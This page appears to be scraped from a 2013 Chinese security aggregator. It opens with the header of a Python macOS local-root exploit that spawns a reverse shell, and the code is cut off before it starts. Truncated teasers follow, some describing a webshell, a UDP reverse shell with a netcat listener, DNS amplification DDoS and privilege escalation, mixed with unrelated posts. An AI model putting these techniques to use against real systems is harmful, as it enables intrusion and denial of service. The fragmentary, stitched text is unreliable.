#!/usr/bin/python # Original MSF Module: # https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/sudo_password_bypass.rb ################################################################################################### # Exploit Title: OSX <= 10.8.4 Local Root Priv Escalation Root Reverse Shell # Date: 08-27-2013 # Exploit Author: David Kennedy @ TrustedSec # Website: https://www.trustedsec.com # Twitter: @Dave_ReL1K # Tested On: OSX 10.8.4 # # Reference: http://www.exploit-db.com/exploits/27944/ # # Example below: # trustedsec:Desktop Dave$ python osx_esc.py # [*] Exploit has been performed. You should have a shell on ipaddr: 127.0.0.1 and

移动自助终端未授权访问-通杀丽江 小峰子0204 | 2013-09-03 14:05 出来旅游，顺手试了下，把营业厅的小妹给吓到了 到火车站继续测试，通杀 [原文地址] 相关内容：

2013-09-03，QQ被恶意申诉的事情回顾 鬼魅羊羔 ((#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸凸(#‵) | 2013-09-04 00:31 今天下午

昨天引用的一句话，引起了很多读者们的共鸣： “以大多数人的努力程度之低，根本轮不到拼天赋。” 我在看到这句话的时候，想起了十多年前的一篇文章 — 《

很多人问我如何成为黑客，一般来说我总是会扯一大堆废话，告诉他们要时刻保持好奇心，要学会打破规则挑战权威之类的。 但这类话肯定不是提问者想听的。

今天知乎搞了个活动，主题是“网络安全的背后”，邀请我作为嘉宾参与答题。 我答了两个题目后感觉不过瘾，于是提了个问题“如何黑掉知乎？”，在知乎答

今天在知乎上有人邀请我回答一个问题：创业团队如何在低成本的情况下保护自己的网站安全？ 简略答一下。 一般来说，很多安全专家都会告诉你没有绝对的安

一个公司在成长过程中，难免会遭遇一些公关事件，如果回应的很笨拙，则可能会变得很被动。所以虽然我不提倡主动挑起公关事件，但如果事情找上门来了，

这两天黑哥（回复00查看关于黑哥的文章）也来北京了，和很多朋友们一起吃饭。黑哥是一个很固持己见的人，席间与各大互联网公司的人进行了PK。 黑哥

科技行业每隔一段时间就会炒热一个概念，然后各种行业大会里都开始讲相关的议题，很多专家会跑出来现身说法，热泪盈眶，似乎看到了未来世界，产生了一

9月2日消息，近期刚刚完成首轮融资的顺丰速运日前被曝出正在内测一种“无人机快递”，通过低空飞行器运载包裹，自动送达目的地，目的主要在于解决偏

为筹钱和女友去日本旅游，网络工程师王璐竟在大白天冒充快递员入室抢劫七旬老人，先用乙醚捂住对方嘴巴，后用刀残忍地刺向对方颈部，将其杀害，抢得1

某些朋友需求，这里简单的修改了下菜刀原作者的JSP脚本。主要是修复了一些BUG和代码优化，新增了查询自定义备份功能。 修复BUG： 1、初始化获

丫。lz@我了。。。 我随便说说吧。 获取到linux权限之后。首先收集信息 端口信息。看有没连接389之类的。。（如果有389端口，那么恭喜你 这

Linux_Exploit_Suggester ： https://github.com/PenturaLabs/Linux_Exploit_Suggester 一个通过Kernel版本在exploit-db查询相关exp的小脚本，一直比较期待有个智能的提权script，一定要“云”化，哪个ex

白帽子黑客是怎样的一群人？ 乌云上的白帽子，找网站漏洞，是出于什么心理，会有什么目的？ 张小冲，结界师（专克各种架构师） 知乎用户、知乎用户、陈蓉

内容已屏蔽…… 留言评论（旧系统）： 佚名 @ 2013-08-31 15:41:08 0day？那还不如不发呢，哪来的什么思路啊... 本站回复： 呵呵，你除了看到 0day 这几个字外，还看到其

1：在2003命令行里输入c:\>ntbackup 使用备份向导（高级） 选择只保存系统状态然后选择输出文件名 等待几分钟即可完成第一步 2：

打造TB级流量DDoS大杀器 insight-labs (Root Yourself in Success) | 2013-08-26 20:43 zmap扫遍ipv4地址的udp 53端口，或者某安全意识薄弱国家的ip段 然后编程序，多线程udp

昨天从忘记带钥匙里学到的 xsser (十根阳具有长短!!) | 2013-08-27 11:16 家里防盗门，出门的时候顺手一带，擦，没带钥匙，赶紧找找门边的小纸条找开门的，从女大姐那

TrueCrypt加密之后的文件，目前没有好的办法破解，因此在调查取证的时候，可以考虑以下方法： 4.1 分析和检查是否有TrueCrypt加密之后

大家可能都发现了，本站在过去几天中一直无法访问，这在本站历史上，这种长时间故障的情况极其罕见…… 在这几天中，有很多网友提出了各种猜测，像“被

渗透测试没前途的工作 Anonymous.Antisec (We are anonymous) | 2013-08-24 18:00 之前和几个人聊过，我觉得在正规公司的情况下，工资到一个地方就是瓶颈了。厂商公司的安服部门一般也不受重视，销

0x1： 安装环境linux 64位系统，编译前需要安装 libgmp3-dev, libpcap-dev, gengetopt，然后简单安装make&make install 0x2： 在命令行中的扫描

现在傻逼太多，骗人太好骗 Anonymous.Antisec (We are anonymous) | 2013-08-24 16:56 今天去淘宝搜剑灵激活码 发现好多10几块钱的骗子 又发现这家。。 http://item.taobao.com/item.htm?spm=a230r.1.14.36.ZkoZJY&id=21564095934&initiative_new=1 让你先好评。。。9月发你激活码 成交记录挺

最近乌云社区里有位童鞋发了一个帖子： 说一个域名不知道用了什么手法居然绑定了李毅吧的url，既不是301重定向，也不是域名跳转，也不是域名转发

Java storeImageArray 漏洞 园长 (你在身边就是缘，缘分写在数据库里面。) | 2013-08-21 12:43 碰巧看到我就截个图，有点忙晚点看. 下载：PSA-2013-0811-1-explo

自己改的python 反弹shell，加了UDP，放出来给大家分享 用来对付一些把除了80端口都封了的变态网管 用法 back.py 123.123.123.123 53 udp nc监听： nc -l 53 -u 后面

有很多朋友发消息来说蔡伦除了造纸术的成就外，人品非常差。我开始有点纳闷，怎么这么多人说同一件事情，是不是又有什么畅销书或者《晓说》一类的节目

昨天收到很多朋友的回复，向我推荐了很多有名的太监，等我空了查阅一番资料，然后分享一些给大家。 还有些有争议的问题，比如司马迁到底算不算“太监”